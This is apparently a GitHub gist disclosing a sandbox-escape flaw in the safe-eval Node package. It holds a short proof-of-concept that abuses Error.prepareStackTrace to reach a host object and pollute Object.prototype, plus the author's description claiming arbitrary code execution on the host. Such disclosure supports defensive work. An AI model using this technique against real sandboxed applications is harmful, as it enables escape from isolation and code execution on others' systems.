Skip to content

Instantly share code, notes, and snippets.

@seongil-wi
Last active March 26, 2023 08:22
Embed
What would you like to do?
// node version: 19.8.1
// safe-eval version: 0.4.1
var safeEval = require('safe-eval')
let code = `
(function() {
Error.prepareStackTrace = (_, c) => c[0].getThis();
ret = (new Error()).stack;
ret.__proto__.polluted = "ret.__proto__.polluted";
})()
`
safeEval(code);
const polluted_result = {}["polluted"];
console.log(polluted_result);
@seongil-wi
Copy link
Author

Vulnerability description:

unsafe-eval is a sandbox that can run untrusted code with whitelisted Node's built-in modules. Affected versions of this package are vulnerable to prototype pollution. Especially, the attacker is able to access to host error objects during the generation of a stack trace, which can lead to execution of arbitrary code on the host machine.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment